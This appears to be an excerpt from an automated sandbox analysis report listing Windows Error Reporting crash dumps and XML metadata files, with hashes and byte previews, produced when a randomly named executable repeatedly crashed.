                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.4.9.1.0.4.9.5.5.7.7.0.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.9.4.5.9.4.7.2.-.9.8.d.4.-.4.d.3.9.-.b.f.8.a.-.a.e.f.8.a.2.a.f.f.7.e.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.c.5.a.f.a.a.1.-.2.6.9.1.-.4.6.6.3.-.a.0.b.a.-.f.1.a.c.b.d.3.1.0.5.7.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.t.t.F.p.x.u.M.w.K.z...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.5.0.-.0.0.0.1.-.0.0.1.4.-.b.e.0.1.-.e.d.9.f.5.a.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.a.1.b.8.3.3.9.c.4.f.d.e.2.5.d.7.9.f.9.7.1.1.f.5.5.9.b.5.2.8.1.0.0.0.0.f.f.f.f.!.0.0.0.0.4.8.4.6.9.9.f.e.4.e.c.d.e.2.9.d.a.1.c.5.c.7.3.8.9.2.8.8.1.c.e.a.2.f.9.8.e.b.8.a.!.t.t.F.p.x.u.M.w.K.z...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0././.0.7.:.1.0.:.5.4.:.0.7.!.0.!.t.t.F.p.x.u.M.w.K.z...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 08:18:20 2024, 0x1205a4 type
                                  Category:dropped
                                  Size (bytes):85424
                                  Entropy (8bit):1.8183126099801215
                                  Encrypted:false
                                  SSDEEP:384:Bu0VLziJAE31o3HHfl2k9Tt1MgJJBD/7mVgbiH:BTV3gAE31oPlpTt66D/7mH
                                  MD5:618535972D2820ADDC2EC4CD41182C51
                                  SHA1:B31F02DD65BC77FC3CFF1060573D4134705DF74B
                                  SHA-256:1B115A2EA77C1594F9F3B1551A8B1DB98BCFFDB09C85E8E162759E3FE038DF5E
                                  SHA-512:3DBF013ED967ED7B5A830AA1FCDBAF722C5C1B9F06F5950C0FA95AE9C14844BF3A435D28428893B581AF0533C4A862534FAF4AB9E1FE0846986C04DEE52583D3
                                  Malicious:false
                                  Preview:MDMP..a..... ..........g.........................................0..........T.......8...........T................-......................................................................................................eJ......d.......GenuineIntel............T.......P......g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):8440
                                  Entropy (8bit):3.700724749433386
                                  Encrypted:false
                                  SSDEEP:192:R6l7wVeJTS6sbf6YEIKkSUPD8gmfI9GpBr89bdasfJ/m:R6lXJG6A6YE+SUPD8gmfGtd5fM
                                  MD5:2A56B9F3C34EF65F5F2DCB8EE3A44E28
                                  SHA1:8F832BA206668F54FF27CE61BA6A43BAD7183CB3
                                  SHA-256:5B78063635183D806A86C311EDC3B80B1DE69BD6FB7E7A1E45CEB12907A2A119
                                  SHA-512:EC3912E12377DBCBE108C665708868B639EDFFB49FB3D5DCF3606476AEA54D43B81D20C0650EFF8D959D3CD03459CF5679D5ED9AA60D0AF6CC48C006A539B9AB
                                  Malicious:false
                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.8.0.<./.P.i.
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):4720
                                  Entropy (8bit):4.490366231583568
                                  Encrypted:false
                                  SSDEEP:48:cvIwWl8zsbJg77aI9HXiTpWpW8VYXYm8M4JIvHFvL+q8vhXNj2NHQd:uIjf1I75XiTY7VHJwKRMNHQd
                                  MD5:235BEB8694877288F5281DA25B0B87AF
                                  SHA1:8203C65E26842FB485125E5DA8C6AC553C8D05E7
                                  SHA-256:23BDF68B90E190F32C7F98FF082CF79C8DA73279124FB2CC50F738A922AAB2B0
                                  SHA-512:F82E8C3AC519A31C48DE7C2E713C14DECBDF7A3E03CA4AF3FA6F764B2BFF30055C441F12D2C00C82643AF2910CBCA6CA0EFC6169BB2FA770FC9F3E5D2EEC2728
                                  Malicious:false
                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534201" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 08:18:21 2024, 0x1205a4 type
                                  Category:dropped
                                  Size (bytes):85316
                                  Entropy (8bit):1.8398244565205872
                                  Encrypted:false
                                  SSDEEP:384:10VLzqDuAEpy3H7XhF9Tt1MgJJBD/7mVD+gNWnl:mV3qDuAE0jhfTt66D/7mvQn
                                  MD5:124843E51D41EF7BEBB26B974A1F8F7B
                                  SHA1:B2DC877D9425B032B5D9AFAF1EB81AD632D8F49D
                                  SHA-256:2E1E5A840D9D08D563EC594EBA7758C23B44B15A712D1724035A6089F3F2016C
                                  SHA-512:3B045CAEE6BFB8CFB7443D22CC9912624D1F11227088D2AB5257F10AE80A991EBB701C82CD4B940D2B6DFB1676FBF0E1AFFF3558D0B60997F4286F61E16C8207
                                  Malicious:false
                                  Preview:MDMP..a..... ..........g.........................................0..........T.......8...........T...........h ...,......................................................................................................eJ......d.......GenuineIntel............T.......P......g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):8440
                                  Entropy (8bit):3.699919047749347
                                  Encrypted:false
                                  SSDEEP:192:R6l7wVeJT96i6YEIYSUPD8gmfI9GpBG89bGasf0im:R6lXJp6i6YE3SUPD8gmfGuG5fQ
                                  MD5:783CFFDE48682117910BC551EABF1412
                                  SHA1:6D2BF4628BA6FE74E7CACD4234DDB19E65F139EE
                                  SHA-256:70E30112D9293B5EF3263B046392ECA80CA67DBC113246EECA8B09764701AF94
                                  SHA-512:EA54D6C752973FD4BD7CB971C974E32825C96CE645A085CA3C9D5E802258416A2E40EFBFC327A4032FA301AFD16D3E2333BB606BE02C55E3F5394F3853081EB2
                                  Malicious:false
                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.8.0.<./.P.i.
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):4720
                                  Entropy (8bit):4.490957257217505
                                  Encrypted:false
                                  SSDEEP:48:cvIwWl8zsbJg77aI9HXiTpWpW8VYSYm8M4JIvHFJB+q8vhXNj2NHQd:uIjf1I75XiTY7VyJQBKRMNHQd
                                  MD5:63057B6E60490DF018DB790368E40B3E
                                  SHA1:2F4A3E3567E92381903A7D948C76B4983B629D89
                                  SHA-256:B05F6DEC8359EF1C194F9B10074C27408B902AA8AABE1E091BB3A9A6E531EBA0
                                  SHA-512:3C63C1B8AA03B2624877973B909861B301BFFEFCA28C02E0381251FF1D5835332A95336177ED180383EA6974866B091173055C04ED3E755793B4655BDA239AA6
                                  Malicious:false
                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534201" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 08:18:22 2024, 0x1205a4 type
                                  Category:dropped
                                  Size (bytes):94988
                                  Entropy (8bit):1.693124221925867
                                  Encrypted:false
                                  SSDEEP:384:w0iU++xYAEkzA/mwic6mJBD/7mVcU4NslR:w0P++6AEk8/mwXnD/7mqsn
                                  MD5:074462E52B9E8397B29BE1BAC027FA98
                                  SHA1:9CD64D3D28F14154BF1AB05C8DD53CF79B351E4A
                                  SHA-256:793976CA7CACA417740CD2B65A35D9148F8E4F8033115A59EA7CB37E1F212F7D
                                  SHA-512:DD761F0810E712DFB55BB29973D7CB82D70547EA50FB258FA6D2D3FF4E40376526693C7996F2E9759332001F123DD26DBDF7B4BABB1D40164516667DBCA9F6AB
                                  Malicious:false
                                  Preview:MDMP..a..... ..........g............T...............\............6..........T.......8...........T............!...Q..........@...........,...............................................................................eJ..............GenuineIntel............T.......P......g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):8440
                                  Entropy (8bit):3.701598225156464
                                  Encrypted:false
                                  SSDEEP:192:R6l7wVeJTG6A66YEISSUPD8gmfI9GpBM89bGasfMim:R6lXJy6A66YEdSUPD8gmfG4G5fI
                                  MD5:2275E80139CE6A1D17155A7EA5AD2AD1
                                  SHA1:47726E7EFA5E158BB6EE30DE81156C70A18C3AAC
                                  SHA-256:A522246131AA8660FEA8C1C1AAA415F7788B43FE969A119456B1FA8CB5823813
                                  SHA-512:1A7382533076AC0C080FBFBCBECE6BD32E6EDAB78742551F8EC0C0B61382471D616A362266ED7C46A58F624F5B907C9DEB7C0850DC4308D0708107DAF5EE1733
                                  Malicious:false
                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.8.0.<./.P.i.
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):4720
                                  Entropy (8bit):4.491168039043668
                                  Encrypted:false
                                  SSDEEP:48:cvIwWl8zsbJg77aI9HXiTpWpW8VYwYm8M4JIvHFf+q8vhXNj2NHQd:uIjf1I75XiTY7VoJMKRMNHQd
                                  MD5:F387E0004E23BE1401080E672E8F04EB
                                  SHA1:DF9FF115D0E2AE84EED5B46DA26FC865C110A859
                                  SHA-256:0278E8B3BE6E3364F30BED1EC615CA2791D9CC3D4946D2E35570A68BFDC3BE34
                                  SHA-512:BCA000430635BB611C4136E18ACDA714F60C7E36A63176FA29D09DF48F10AD451EDBFB9EC008842A0247202BC1A1C19931430259DC101F33E5B56B2B1E557E21
                                  Malicious:false
                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534201" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 08:18:23 2024, 0x1205a4 type
                                  Category:dropped
                                  Size (bytes):94564
                                  Entropy (8bit):1.7041614339149131
                                  Encrypted:false
                                  SSDEEP:384:QiU+SAEAwDzhiRMRJBD/7mVngqkZjo0K2H:QP+SAEVDtakD/7m5gjo0vH
                                  MD5:E59126080A8F1EC41C49AF5AD41420ED
                                  SHA1:6FA3A7C79A4CB5BDEDDC37A5A260AD27236808C5
                                  SHA-256:E3103E37A2483B5FE8430951C425B3958869BE29DFE562FBA9C70457BB342B4D
                                  SHA-512:5EA929FBB98EAB31E8F074AC3A522710ECB4300F396DB351B1161420B15A66119AB33CD6EE94093EE088DC3B0E2A1C456BA9DE3AEE05BA3195BBA3C2A9D31F5B
                                  Malicious:false
                                  Preview:MDMP..a..... ..........g............T...............\............6..........T.......8...........T............!..lO..........@...........,...............................................................................eJ..............GenuineIntel............T.......P......g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):8440
                                  Entropy (8bit):3.6993833368152687
                                  Encrypted:false
                                  SSDEEP:192:R6l7wVeJTM6u6YEIlSU2D8gmfI9GpBq89bPasfWdlm:R6lXJ46u6YEKSU2D8gmfGiP5fWe
                                  MD5:BA57184151A9682461AFFCE2FBF38A62
                                  SHA1:D64B2DDB82A80DE7F70C717B9E1E9BF0D40522AA
                                  SHA-256:7592499F54E09DFF331297E4EB2E4EC73BF19D48D5A158749F9543DF4DD332F6
                                  SHA-512:60B81F5B01443D6EF3AD0373779F4C09E699F3B59FF81A728D34852C67A954541E1EBBC6FF01257E7BCEA91233BDA7609FF169FECE33A34AFCF4A97196EC67BC
                                  Malicious:false
                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.8.0.<./.P.i.
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):4720
                                  Entropy (8bit):4.490704094031481
                                  Encrypted:false
                                  SSDEEP:48:cvIwWl8zsbJg77aI9HXiTpWpW8VYQYm8M4JIvHFbc+q8vhXNj2NHQd:uIjf1I75XiTY7V0J3KRMNHQd
                                  MD5:F51C1B5C6D5CFFF869AEEDA2540E9A45
                                  SHA1:29E501E683642F8024CEB255D60B77D857810C78
                                  SHA-256:49E1051AB44C66982156E1338E0531C7FE8C90E18B0454D200865BA54F11EB96
                                  SHA-512:CEB7071FE562AB9359FFC1FA85CECBBCB93604282473E7A61B8CC769F9F72AE6B0D36E91EC05EF27B145C4E1CFE3E7A3B89C23DC5A91759BE44D6BE47DD0E3B0
                                  Malicious:false
                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534201" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 08:18:24 2024, 0x1205a4 type
                                  Category:dropped
                                  Size (bytes):101954
                                  Entropy (8bit):1.6958269123877692
                                  Encrypted:false
                                  SSDEEP:384:NiuRR5AEFzhv4vcR5feD/KQVhhuNEhNH:/RR5AEFtvDeD/KQY6r
                                  MD5:292D6B2FFF29E81A0003E6B04B066CFB
                                  SHA1:C437472B18F3994B178B74F04A179870E2467CD0
                                  SHA-256:8FA8E6A46C43E52721104431CBE2040859A7E2CB4C4BD5356C8D79385C97350E
                                  SHA-512:297FD7E784EA71077C54283F47FB0D4999F7990E2E7D12AF38E5A65C4FAE5EE049C02ECB8BEE9E78D85BFF597485011B4F5B57BA0E9ECD52688CC9E30AD8D375
                                  Malicious:false
                                  Preview:MDMP..a..... ..........g........................(...............f;..........T.......8...........T............*..*d......................................................................................................eJ......8.......GenuineIntel............T.......P......g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):8440
                                  Entropy (8bit):3.6996405877387124
                                  Encrypted:false
                                  SSDEEP:192:R6l7wVeJTA66w6YEIZSUdDigmfI9GpB089bwasfXwm:R6lXJ06V6YE2SUdDigmfGAw5fl
                                  MD5:4DBE63912C81DFA1385C4A6A57617AD4
                                  SHA1:020569B26816BB5D059FDFD5CEBC978CA20DBFCF
                                  SHA-256:88A45393455BF3B921FB4BEA9FB3EF797303D9CE9E82280E2F53A4A12F9B64A5
                                  SHA-512:78E839B2922F9A6F9EAEBCA515FA1D1C85C0A7289EF7A4066F42BF5BCD75CF268C7603FDEA00DC52F343B5EC79BF5EFEDD4F57046E6810F2C68D8697A5E0E66B
                                  Malicious:false
                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.8.0.<./.P.i.
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):4720
                                  Entropy (8bit):4.4920683854366885
                                  Encrypted:false
                                  SSDEEP:48:cvIwWl8zsbJg77aI9HXiTpWpW8VYbYm8M4JIvHF7C+q8vhXNj2NHQd:uIjf1I75XiTY7VvJICKRMNHQd
                                  MD5:27643F9F54027B873B310B2375F48F8E
                                  SHA1:E5ED1E8EED9F9662045DF252FFA16E1C26766155
                                  SHA-256:89EAAD6546766FA9E128412BD6463431BCD87977B64A1EAC7A9A1F6FEBA23377
                                  SHA-512:81217B0B289791D69527195E2DF67544F63AB6F60F2D62EADA8BBEB18E592F04BBB5BCB7BDA61ABF928FF2521BA12075D6C73F4422D23373538293658FECB44E
                                  Malicious:false
